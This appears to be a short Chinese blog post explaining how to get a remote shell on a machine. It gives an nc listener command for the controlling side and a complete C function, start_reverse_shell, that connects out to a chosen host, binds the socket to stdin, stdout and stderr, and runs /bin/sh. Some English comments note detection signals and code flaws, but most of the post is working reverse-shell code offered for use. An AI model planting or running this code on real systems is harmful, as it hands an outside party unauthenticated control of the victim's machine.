给服务端一个shell控制端

大耗子 2020年04月02日 187次浏览

文章链接:https://codemouse.online/archives/2020-04-02182636

服务端(控制端)开启监听,等待被控端连接

# Listen (-l) verbosely (-v) on local TCP port 6666 (-p). The listener takes
# whatever connects first: there is no authentication and the stream is
# plain, unencrypted TCP.
nc -lvp 6666

被控端主动连接服务器,并把本机的 shell 交给服务端控制(即反向 shell)。连接是明文 TCP,没有任何认证和加密。

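/**
 * Connect to bd_ip:bd_port over TCP and replace the current process with
 * /bin/sh whose stdin, stdout and stderr are the connected socket.
 *
 * The peer that accepted the connection reads and writes the shell directly.
 * The stream is plain TCP: nothing here authenticates the peer or encrypts
 * the traffic.
 *
 * Defender's view: at runtime this shows up as an outbound TCP connection
 * followed by a /bin/sh process whose descriptors 0, 1 and 2 all refer to
 * that same socket. A shell with a network socket as its standard streams is
 * the signal process/socket auditing should alert on.
 *
 * @param bd_ip   Host name or IPv4 address string, resolved with
 *                gethostbyname().
 * @param bd_port TCP port in host byte order (converted with htons() here).
 *
 * Returns without reporting an error on any failure. Does not return when
 * execl() succeeds.
 */
void start_reverse_shell(char *bd_ip, unsigned short int bd_port)
{
    int sd;
    struct sockaddr_in serv_addr;
    struct hostent *server;

    sd = socket(AF_INET, SOCK_STREAM, 0);
    if (sd < 0)
        return;

    server = gethostbyname(bd_ip);
    /*
     * Only accept an IPv4 result whose length matches the destination field;
     * otherwise the bcopy() below would write past sin_addr.
     */
    if (server == NULL || server->h_addrtype != AF_INET ||
        server->h_length != (int)sizeof(serv_addr.sin_addr.s_addr)) {
        close(sd);  /* do not leak the socket on the error path */
        return;
    }

    bzero((char *) &serv_addr, sizeof(serv_addr));
    serv_addr.sin_family = AF_INET;
    bcopy((char *)server->h_addr, (char *)&serv_addr.sin_addr.s_addr, server->h_length);
    serv_addr.sin_port = htons(bd_port);

    if (connect(sd, (struct sockaddr *)&serv_addr, sizeof(serv_addr)) < 0) {
        close(sd);  /* do not leak the socket on the error path */
        return;
    }

    /* Redirect stdin, stdout and stderr to the socket. */
    dup2(sd, 0);
    dup2(sd, 1);
    dup2(sd, 2);

    /*
     * Run the shell.
     * NOTE(review): arg0 is NULL, so the shell is started with an empty
     * argument list; POSIX expects argv[0] to name the program.
     */
    execl("/bin/sh", NULL, NULL);

    /*
     * Only reached if execl() failed. Descriptors 0-2 still refer to the
     * socket at this point; only the original descriptor is closed.
     */
    close(sd);
}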